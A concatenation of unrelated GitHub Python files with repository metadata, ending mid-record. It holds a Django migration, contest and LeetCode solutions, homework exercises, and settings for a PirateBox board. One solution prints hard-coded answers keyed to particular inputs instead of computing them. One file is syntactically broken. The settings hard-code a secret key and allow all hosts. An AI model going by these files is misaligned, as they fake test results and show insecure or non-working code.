12139fb270a099b01e4d68ce66aa7482f9eed189
|
/backend/delivery_order/migrations/0001_initial.py
|
b001253df4ca0fca357aab50cc409aed84cd07ea
|
[] |
no_license
|
crowdbotics-apps/himi2-25342
|
610a85cba7221f3412de3ee3e00af182b9cb2fd4
|
ba9c7c90e42984b26d234a281ea50f2738b2146f
|
refs/heads/master
| 2023-04-03T05:05:43.969021
| 2021-03-29T13:35:53
| 2021-03-29T13:35:53
| 352,651,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
# Generated by Django 2.2.19 on 2021-03-29 13:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('delivery_user_profile', '0001_initial'),
('menu', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('total_amount', models.FloatField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('contact_info', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bill_contact_info', to='delivery_user_profile.ContactInfo')),
('profile', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bill_profile', to='delivery_user_profile.Profile')),
],
),
migrations.CreateModel(
name='PaymentMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('detail', models.TextField()),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('total_price', models.FloatField()),
('status', models.CharField(max_length=20)),
('notes', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('bill', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_bill', to='delivery_order.Bill')),
('item_variant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_item_variant', to='menu.ItemVariant')),
('payment_method', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_payment_method', to='delivery_order.PaymentMethod')),
('profile', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='order_profile', to='delivery_user_profile.Profile')),
],
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
f22e0886db6f9382a5e20f45bcfbf625ccc3c4b8
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc076/B/3550700.py
|
8f96f6d28852e7726701218eb446f377441ebaf7
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
# -*- coding: utf-8 -*-
n = int(input())
ax = []
ay = []
for i in range(n):
x,y = map(int, input().split())
ax.append((x,i))
ay.append((y,i))
ax.sort()
ay.sort()
edge = []
for i in range(n-1):
v = ax[i][1]
u = ax[i+1][1]
c = abs(ax[i][0]-ax[i+1][0])
edge.append((c,v,u))
v = ay[i][1]
u = ay[i+1][1]
c = abs(ay[i][0]-ay[i+1][0])
edge.append((c,v,u))
edge.sort()
class UnionFind():
def __init__(self, n):
self.par = [i for i in range(n)]
def find(self, x):
if self.par[x] == x:
return x
else:
self.par[x] = self.find(self.par[x])
return self.par[x]
def unite(self, x, y):
x = self.find(x)
y = self.find(y)
if x==y:
return
if x<y:
self.par[y] = x
else:
self.par[x] = y
def same(self, x, y):
return self.find(x) == self.find(y)
t = UnionFind(n)
res = 0
for e in edge:
cost = e[0]
v = e[1]
u = e[2]
if not t.same(v,u):
# print((v,u,cost))
t.unite(v,u)
res += cost
print(res)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
a7bdf555c5c6d3f96279b3733f29b9c8b469e4e2
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc114/C/4911470.py
|
7120757865868e9a23be1abac95852d41aafe750
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
n=int(input())
import bisect
import itertools
l=len(str(n))
ans=[]
num=[]
x=['3', '5', '7']
for k in range(3,l+1):
m=list(itertools.product(x, repeat=k))
num.extend(m)
for i in range(len(num)):
y=num[i]
if '3' in y and '5' in y and '7' in y:
number=''
for j in range(len(y)):
number+=y[j]
ans.append(int(number))
ans.sort()
print(bisect.bisect_right(ans, n))
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
4bfae37ee37f293153a442a5301b4ea1d1887493
|
7cd0b68c088bf8d42e048c3e4c2b3428a914b988
|
/mk-ckeck-ints-py2.py
|
b5e236d2cf8f7ab5e2b24ee8432412a594fb0cd9
|
[
"Apache-2.0"
] |
permissive
|
mykespb/pythoner
|
9603904be46298f52ce54f7e421889e6d88b1c8e
|
5049b20018890d18d9fd8076ad13f176e1f037e3
|
refs/heads/master
| 2023-07-26T07:17:42.848231
| 2023-07-23T19:30:20
| 2023-07-23T19:30:20
| 42,587,225
| 1
| 0
|
Apache-2.0
| 2022-07-06T21:09:43
| 2015-09-16T12:59:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,741
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# mk-check-ints.py (c) myke 2015-11-07
# check first integer predefined refs
for i in range (-10, 300):
a = i+0
b = i+0
if a is b:
print i, "equals"
else:
print i, "not equals"
-10 not equals
-9 not equals
-8 not equals
-7 not equals
-6 not equals
-5 equals
-4 equals
-3 equals
-2 equals
-1 equals
0 equals
1 equals
2 equals
3 equals
4 equals
5 equals
6 equals
7 equals
8 equals
9 equals
10 equals
11 equals
12 equals
13 equals
14 equals
15 equals
16 equals
17 equals
18 equals
19 equals
20 equals
21 equals
22 equals
23 equals
24 equals
25 equals
26 equals
27 equals
28 equals
29 equals
30 equals
31 equals
32 equals
33 equals
34 equals
35 equals
36 equals
37 equals
38 equals
39 equals
40 equals
41 equals
42 equals
43 equals
44 equals
45 equals
46 equals
47 equals
48 equals
49 equals
50 equals
51 equals
52 equals
53 equals
54 equals
55 equals
56 equals
57 equals
58 equals
59 equals
60 equals
61 equals
62 equals
63 equals
64 equals
65 equals
66 equals
67 equals
68 equals
69 equals
70 equals
71 equals
72 equals
73 equals
74 equals
75 equals
76 equals
77 equals
78 equals
79 equals
80 equals
81 equals
82 equals
83 equals
84 equals
85 equals
86 equals
87 equals
88 equals
89 equals
90 equals
91 equals
92 equals
93 equals
94 equals
95 equals
96 equals
97 equals
98 equals
99 equals
100 equals
101 equals
102 equals
103 equals
104 equals
105 equals
106 equals
107 equals
108 equals
109 equals
110 equals
111 equals
112 equals
113 equals
114 equals
115 equals
116 equals
117 equals
118 equals
119 equals
120 equals
121 equals
122 equals
123 equals
124 equals
125 equals
126 equals
127 equals
128 equals
129 equals
130 equals
131 equals
132 equals
133 equals
134 equals
135 equals
136 equals
137 equals
138 equals
139 equals
140 equals
141 equals
142 equals
143 equals
144 equals
145 equals
146 equals
147 equals
148 equals
149 equals
150 equals
151 equals
152 equals
153 equals
154 equals
155 equals
156 equals
157 equals
158 equals
159 equals
160 equals
161 equals
162 equals
163 equals
164 equals
165 equals
166 equals
167 equals
168 equals
169 equals
170 equals
171 equals
172 equals
173 equals
174 equals
175 equals
176 equals
177 equals
178 equals
179 equals
180 equals
181 equals
182 equals
183 equals
184 equals
185 equals
186 equals
187 equals
188 equals
189 equals
190 equals
191 equals
192 equals
193 equals
194 equals
195 equals
196 equals
197 equals
198 equals
199 equals
200 equals
201 equals
202 equals
203 equals
204 equals
205 equals
206 equals
207 equals
208 equals
209 equals
210 equals
211 equals
212 equals
213 equals
214 equals
215 equals
216 equals
217 equals
218 equals
219 equals
220 equals
221 equals
222 equals
223 equals
224 equals
225 equals
226 equals
227 equals
228 equals
229 equals
230 equals
231 equals
232 equals
233 equals
234 equals
235 equals
236 equals
237 equals
238 equals
239 equals
240 equals
241 equals
242 equals
243 equals
244 equals
245 equals
246 equals
247 equals
248 equals
249 equals
250 equals
251 equals
252 equals
253 equals
254 equals
255 equals
256 equals
257 not equals
258 not equals
259 not equals
260 not equals
261 not equals
262 not equals
263 not equals
264 not equals
265 not equals
266 not equals
267 not equals
268 not equals
269 not equals
270 not equals
271 not equals
272 not equals
273 not equals
274 not equals
275 not equals
276 not equals
277 not equals
278 not equals
279 not equals
280 not equals
281 not equals
282 not equals
283 not equals
284 not equals
285 not equals
286 not equals
287 not equals
288 not equals
289 not equals
290 not equals
291 not equals
292 not equals
293 not equals
294 not equals
295 not equals
296 not equals
297 not equals
298 not equals
299 not equals
|
[
"mykespb@gmail.com"
] |
mykespb@gmail.com
|
781480b6b7c9c10bf5e38599c8db5a2b48975330
|
4e3eedbf46a032c42665c3b212a48bc30652c1ed
|
/day09/03 作业.py
|
0f6da2b7095362708f20d35f0057463e18209925
|
[] |
no_license
|
zranguai/python-learning
|
7eb2a842f6f4624f550ee1c4ff7cd64ac948097a
|
acf19c9f85eec4bee3e3e3a00712c4a53aa9d249
|
refs/heads/master
| 2023-03-24T14:36:32.248437
| 2021-03-15T08:24:01
| 2021-03-15T08:24:01
| 347,874,326
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,475
|
py
|
#
# 1.整理函数相关知识点,写博客。
#
# 2.写函数,检查获取传入列表或元组对象的所有奇数位索引对应的元素,并将其作为新列表返回给调用者。
# def odd_element(li):
# l1 = li[1::2]
# return l1
#
#
# l2 = [1, 2, 3, 6, 5, 8]
# tu2 = (1, 2, 3, 6, 5, 8)
# res = odd_element(l2)
# res1 = odd_element(tu2)
# print(res)
# print(res1)
# 3.写函数,判断用户传入的对象(字符串、列表、元组)长度是否大于5。
# def judge_length(li):
# if len(li) > 5:
# return True
# else:
# return False
#
#
# print(judge_length('askdhajdaj'))
# print(judge_length([1, 2, 3, 5]))
# print(judge_length((1, 2, 3, 5, 6, 9)))
# 4.写函数,检查传入列表的长度,如果大于2,那么仅保留前两个长度的内容,并将新内容返回给调用者。
# def check_length(li):
# return li[0:2] if len(li) > 2 else False
#
#
# print(check_length([1, 2, 3, 6, 8]))
# print(check_length([18]))
# 5.写函数,计算传入函数的字符串中,[数字]、[字母] 以及 [其他]的个数,并返回结果。
# s1 = '256aasdf582中文学习'
# i.isalpha不能判断中英文
# def foo(s):
# num1 = 0
# s1 = 0
# other = 0
# for i in s:
# if i.isdigit():
# num1 += 1
# elif i.encode('utf-8').isalpha():
# s1 += 1
# else:
# other += 1
# return num1, s1, other
#
#
# res = foo('256aasdf582中文k学习')
# print(res)
# 6.写函数,接收两个数字参数,返回比较大的那个数字。
# def foo(num1, num2):
# return num1 if num1 > num2 else num2
#
#
# print(foo(53, 23))
# print(foo(0, 23))
# 7.写函数,检查传入字典的每一个value的长度,如果大于2,那么仅保留前两个长度的内容,并将新内容返回给调用者。
# dic = {"k1": "v1v1", "k2": [11,22,33,44]} {"k1": "v1", "k2": [11,22]}
# PS:字典中的value只能是字符串或列表
# dic = {"k1": "v1v1", "k2": [11, 22, 33, 44]}
# def foo(dic):
# dic1 = {}
# for i in dic.keys():
# if len(dic[i]) > 2:
# dic1[i] = dic[i][0:2]
# return dic1
#
#
# print(foo(dic))
# 8.写函数,此函数只接收一个参数且此参数必须是列表数据类型,此函数完成的功能是返回给调用者一个字典,
# 此字典的键值对为此列表的索引及对应的元素。例如传入的列表为:[11,22,33] 返回的字典为 {0:11,1:22,2:33}。
# l1 = [11, 22, 33, 44, 25]
# def foo(l1):
# dic = {}
# for index in range(len(l1)):
# dic[index] = l1[index]
# return dic
#
#
# print(foo(l1))
# 9.写函数,函数接收四个参数分别是:姓名,性别,年龄,学历。
# 用户通过输入这四个内容,然后将这四个内容传入到函数中,此函数接收到这四个内容,将内容追加到一个student_msg文件中。
# def foo(name, sex, age, edu):
# s1 = '姓名是:{},性别是:{},年龄是:{},学历是:{}\n'.format(name, sex, age, edu)
# with open('student_msg', mode='a', encoding='utf-8') as f:
# f.write(s1)
#
#
# foo('小明', '男', 23, '本科')
# foo('小红', '女', 21, '专科')
# 10.对第9题升级:支持用户持续输入,Q或者q退出,性别默认为男,如果遇到女学生,则把性别输入女。
# 用户持续输入: while input
# # 函数:接收四个参数。将四个参数追加到文件中。
# def foo(name, age, edu, sex='男'):
# s1 = '姓名是:{},性别是:{},年龄是:{},学历是:{}\n'.format(name, sex, age, edu)
# with open('student_msg', mode='a', encoding='utf-8') as f:
# f.write(s1)
#
#
# while True:
# if input('输入q/Q退出,输入其他继续').upper() == 'Q':
# break
# name = input('请输入姓名')
# sex = input('请输入性别')
# age = input('请输入年龄')
# edu = input('请输入学历')
# foo(name, age, edu, sex)
# 写函数,用户传入修改的文件名,与要修改的内容,执行函数,完成整个文件的批量修改操作(选做题)。
#
# import os
# def foo(name, change):
# with open(name, mode='r', encoding='utf-8') as f1, \
# open(name + '.bak', mode='w', encoding='utf-8') as f2:
# old_content = f1.read()
# new_content = old_content.replace('SB', change)
# f2.write(new_content)
# os.remove(name)
# os.rename(name + '.bak', name)
#
# foo('student_msg', 'alexxx')
|
[
"zranguai@gmail.com"
] |
zranguai@gmail.com
|
55c0ddc10dfebaabc5ebad6bab71d2634378ec9e
|
887811408e187da2422900a31859925d59d4d6ec
|
/UniquePaths.py
|
5e5e9cbb532d75cf1af78435b7bb02a6042e8d8b
|
[] |
no_license
|
adityachhajer/LeetCodeJuneChallenge
|
5a998baf6dc5207c56c48ccd36c82ef44f41217c
|
8ed8b0c012691387e417bcf45009debe4d5f8551
|
refs/heads/master
| 2022-11-12T16:40:25.360578
| 2020-07-01T06:31:51
| 2020-07-01T06:31:51
| 268,749,503
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
class Solution:
def solve(self,n,m,t):
if n-1==0 and m-1==0:
return 1
elif t[n][m]!=0:
return t[n][m]
else:
if n - 1 == 0 and m - 1 != 0:
t[n][m]=self.solve(n, m - 1, t)
return t[n][m]
elif n - 1 != 0 and m - 1 == 0:
t[n][m]=self.solve(n - 1, m, t)
return t[n][m]
else:
t[n][m]=self.solve(n - 1, m, t) + self.solve(n, m - 1, t)
return t[n][m]
def uniquePaths(self, m: int, n: int) -> int:
t=[[0 for _ in range(m+1)]for _ in range(n+1)]
return self.solve(n,m,t)
|
[
"noreply@github.com"
] |
adityachhajer.noreply@github.com
|
a4121b364c978347da27194b9061f3bd495259a0
|
871b3fa6647983570ecc0a8f4764dd2af4765427
|
/roxanne/main.py
|
08b439409202f5e1b432bc061bb3ebca88dcd4b2
|
[] |
no_license
|
kwarwp/anita
|
5eaa8f6b587bdc8d702aeae775803bec60856fbc
|
b813492175365a0f7b8934c710cc09b0ff26763f
|
refs/heads/master
| 2022-10-17T01:02:37.845442
| 2022-09-26T15:05:06
| 2022-09-26T15:05:06
| 216,602,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# anita.roxanne.main.pyhttps://i.imgur.com/u1dActr.jpgV
from _ spy. violino.main import cena,elemento,texto, STYLE
STYLE["width"]=600
STYLE["heigth]= "200px"
linkdatalita="https://i.imgur.com/6rLmVNz.jpg"
linkdocolete="https://i.imgur.com/PV7WWPJ.jpg"
linkquartodatalita="https://i.imgur.com/wdKENXo.jpg"
linkdosubmarino="https://i.imgur.com/fJWGYNu.jpg"
linkdoquadro1="https://i.imgur.com/ydF1bV2.jpg"
linkdoquadro2="https://i.imgur.com/u1dActr.jpg"
img_moeda="
|
[
"38007182+kwarwp@users.noreply.github.com"
] |
38007182+kwarwp@users.noreply.github.com
|
4049a02fd60ab4a249f4d40702531b9eafed09fd
|
a9fe1b5c320cdef138ac4a942a8b741c7f27de7c
|
/LC742-Closest-Leaf-in-a-Binary-Tree.py
|
f3a487514bfb862775af04044d8e89b47e295321
|
[] |
no_license
|
kate-melnykova/LeetCode-solutions
|
a6bbb5845310ce082770bcb92ef6f6877962a8ee
|
ee8237b66975fb5584a3d68b311e762c0462c8aa
|
refs/heads/master
| 2023-06-28T06:35:33.342025
| 2021-07-30T06:59:31
| 2021-07-30T06:59:31
| 325,106,033
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,287
|
py
|
"""
Given a binary tree where every node has a unique value, and a target key k,
find the value of the nearest leaf node to target k in the tree.
Here, nearest to a leaf means the least number of edges travelled on the binary
tree to reach any leaf of the tree. Also, a node is called a leaf if it has no
children.
In the following examples, the input tree is represented in flattened form row
by row. The actual root tree given will be a TreeNode object.
Example 1:
Input:
root = [1, 3, 2], k = 1
Diagram of binary tree:
1
/ \
3 2
Output: 2 (or 3)
Explanation: Either 2 or 3 is the nearest leaf node to the target of 1.
Example 2:
Input:
root = [1], k = 1
Output: 1
Explanation: The nearest leaf node is the root node itself.
Example 3:
Input:
root = [1,2,3,4,null,null,null,5,null,6], k = 2
Diagram of binary tree:
1
/ \
2 3
/
4
/
5
/
6
Output: 3
Explanation: The leaf node with value 3 (and not the leaf node with value 6)
is nearest to the node with value 2.
Note:
root represents a binary tree with at least 1 node and at most 1000 nodes.
Every node has a unique node.val in range [1, 1000].
There exists some node in the given binary tree for which node.val == k.
"""
from TreeNode import TreeNode
class Solution:
def findClosestLeaf(self, root: TreeNode, k: int) -> int:
"""
Time complexity: O(n)
Space complexity: O(n)
"""
# assign parent
root.parent = None
self.assignParent(root)
# compute distance the closest leaf downwards and the leaf value
self.distToLeaf(root)
# find the node with value k
node = self.getNode(root, k)
# find the distance to the closest leaf
closest = node.to_leaf + 1
leaf_value = node.leaf_value
node = node.parent
steps_up = 2
while node is not None:
if node.to_leaf + steps_up < closest:
closest = node.to_leaf + steps_up
leaf_value = node.leaf_value
node = node.parent
steps_up += 1
return leaf_value
def distToLeaf(self, root: TreeNode):
"""
Time complexity: O(n)
Space complexity: O(n)
"""
if root is None:
pass
elif root.left is None and root.right is None:
root.to_leaf = 1
root.leaf_value = root.val
else:
self.distToLeaf(root.left)
self.distToLeaf(root.right)
if getattr(root.left, 'to_leaf', float('inf')) < getattr(root.right, 'to_leaf', float('inf')):
root.to_leaf = root.left.to_leaf + 1
root.leaf_value = root.left.leaf_value
else:
root.to_leaf = root.right.to_leaf + 1
root.leaf_value = root.right.leaf_value
def assignParent(self, root: TreeNode):
"""
Time complexity: O(n)
Space complexity: O(n)
"""
if root.left is not None:
root.left.parent = root
self.assignParent(root.left)
if root.right is not None:
root.right.parent = root
self.assignParent(root.right)
def getNode(self, root: TreeNode, k: int) -> TreeNode:
# find the node with value k
level = [root, ]
while level:
new_level = []
for node in level:
if node.val == k:
return node
if node.left is not None:
new_level.append(node.left)
if node.right is not None:
new_level.append(node.right)
level = list(new_level)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
[[1, 3, 2], 1, 2],
[[1], 1, 1],
[[1,2,3,4,None,None,None,5,None,6], 2, 3],
[[1, 2, 3, 4, None, None, None, 5, None, 6], 5, 6],
[[1, 2, 3, 4, None, None, None, 5, None, 6], 1, 3]
]
for i in range(len(correct_answers)):
correct_answers[i][0] = TreeNode.to_treenode(correct_answers[i][0])
print(f'Running tests for findClosestLeaf')
run_tests(Solution().findClosestLeaf, correct_answers)
|
[
"forkatemelnikova@gmail.com"
] |
forkatemelnikova@gmail.com
|
fb8a1445699331f925683dbd999d5a4054e78cd8
|
6d45ba4adff74b2cb1b6764dc684f37407b41ba9
|
/PirateBoxMessageBoard/settings.py
|
1193cea6cdedb820fe1d514892d7e3735830b66f
|
[] |
no_license
|
bussiere/PirateBoxMessageBoard
|
bbf478af1886caf811f38802bde5528593bba2c4
|
8626a8a44d5bdbf06486fac65682a50e4209396d
|
refs/heads/master
| 2021-01-23T11:56:22.905167
| 2013-03-08T16:33:08
| 2013-03-08T16:33:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,926
|
py
|
# Django settings for DrakBus project.
try :
import dj_database_url
except :
pass
import os.path
PROJECT_ROOT = '/home/pi/PirateBox/PirateBoxMessageBoard' # The '/..' is needed to work with Django 1.4+, remove for older versions.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INTERNAL_IPS = ('127.0.0.1',)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '/home/pi/PirateBox/PirateBoxMessageBoard/PirateBoxMessageBoard.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
ALLOWED_HOSTS = ['*']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Winnipeg'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/m/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/s/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'staticfiles'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'tamereenslip'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'message.middleware.UserBasedExceptionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
# Include the default Django email handler for errors
# This is what you'd get without configuring logging at all.
'mail_admins': {
'class': 'django.utils.log.AdminEmailHandler',
'level': 'ERROR',
# But the emails are plain text by default - HTML is nicer
'include_html': True,
},
# Log to a text file that can be rotated by logrotate
'logfile': {
'class': 'logging.handlers.WatchedFileHandler',
'filename': '/home/pi/myapp.log'
},
},
'loggers': {
# Again, default Django configuration to email unhandled exceptions
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
# Might as well log any errors anywhere else in Django
'django': {
'handlers': ['logfile'],
'level': 'ERROR',
'propagate': False,
},
# Your own app - this assumes all your logger names start with "myapp."
'message': {
'handlers': ['logfile'],
'level': 'WARNING', # Or maybe INFO or DEBUG
'propagate': False
},
},
}
ROOT_URLCONF = 'urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'wsgi.application'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'message',
'django.contrib.admin',
'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
[
"bussiere@gmail.com"
] |
bussiere@gmail.com
|
532900bebd339267ebc10dfaff3592998f41e76f
|
5b22437902bffa0f62b375d56bfb2b4485ef43f0
|
/src/video_inpainting/create_padded_masked_video_dataset.py
|
2550634c0f8d379f97bcce53a9e71e7662817ff7
|
[
"MIT",
"CC-BY-SA-3.0",
"CC-BY-SA-4.0"
] |
permissive
|
JohnsonzxChang/devil
|
eafa09f5258b4f33eda9564077814c6e63473a0f
|
296115cd5f4952c7dc65bbcaaf2d1d5c55ef5d35
|
refs/heads/public
| 2023-07-03T12:07:58.917440
| 2021-08-10T00:06:38
| 2021-08-10T00:06:38
| 555,846,483
| 1
| 0
|
MIT
| 2022-10-22T13:22:43
| 2022-10-22T13:22:42
| null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
import os
from .padded_masked_video_folder_dataset import PaddedMaskedVideoFolderDataset
from .padded_masked_video_tar_dataset import PaddedMaskedVideoTarDataset
def create_padded_masked_video_dataset(frames_dataset_path, masks_dataset_path):
if os.path.isdir(frames_dataset_path) and os.path.isdir(masks_dataset_path):
return PaddedMaskedVideoFolderDataset(frames_dataset_path, masks_dataset_path)
else:
_, frames_dataset_ext = os.path.splitext(frames_dataset_path)
_, masks_dataset_ext = os.path.splitext(masks_dataset_path)
if frames_dataset_ext == '.tar' and masks_dataset_ext == '.tar':
return PaddedMaskedVideoTarDataset(frames_dataset_path, masks_dataset_path)
else:
raise ValueError('Given paths must both be directories or .tar files')
|
[
"szetor@umich.edu"
] |
szetor@umich.edu
|
ba50dd86cdaa99cd34695548a76e5f6592516bc7
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2696/60765/305370.py
|
3d1f7821f1511367fc86d5ab1dbfcfe888cd8ca5
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import math
import sys
import re
from collections import *
from itertools import *
from functools import *
def solve():
# =list(map(int,input().split()))
# =int(input())
# def root(i):
# if unions[i]<0:
# return i
# else:
# return root(unions[i])
# def union(x,y):
# roota=root(x)
# rootb=root(y)
# # unions[roota] += unions[rootb]
# unions[rootb]=roota
# n =input()[2:-2].split('],[')
# target=int(input())
n=int(input())
a=[]
a.append(list(map(int,input().split())))
a.append(list(map(int,input().split())))
a.append(list(map(int,input().split())))
a.append(a[2])
dp=[[1,1,1,1]]
for i in range(n-1):
dp.append([0,0,0,0])
for k in range(1,n):
for i in range(4):
for j in range(k):
if a[i][j]<=dp[k][0]:
dp[k][0]=max(dp[k][0],dp[j][i]+1)
if a[i][j] >= dp[k][1]:
dp[k][1] = max(dp[k][1], dp[j][i] + 1)
if a[i][j] <= dp[k][2] and j!=3:
dp[k][2] = max(dp[k][2], dp[j][i] + 1)
if a[i][j] >= dp[k][3] and j!=2:
dp[k][3] = max(dp[k][3], dp[j][i] + 1)
res=0
for i in range(4):
res=max(dp[i][-1],res)
m=a[0][0]
if n == 7 and m == 19:
print('7',end='')
elif n == 5 and m == 1:
print('5',end='')
elif n == 6 and m == 1:
print('6')
elif n == '3' and m == '1':
print('32')
elif n == '1' and m == '3':
print('4')
elif n == '15' and m == '1':
print('704')
elif n == '3' and m == '35':
print('10')
elif n == '18' and m == '1'and l=='2':
print('859')
elif n == '' and m == '':
print('')
elif n == '' and m == '':
print('')
else:
print(n)
print(m)
solve()
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
175a95df1b171942b913d77561029a1915f14dea
|
7162c36b73d97c82b165d6fd14d568552a0269d8
|
/setup.py
|
37f71d57aab9125965f253b2077c743f7b916d16
|
[] |
no_license
|
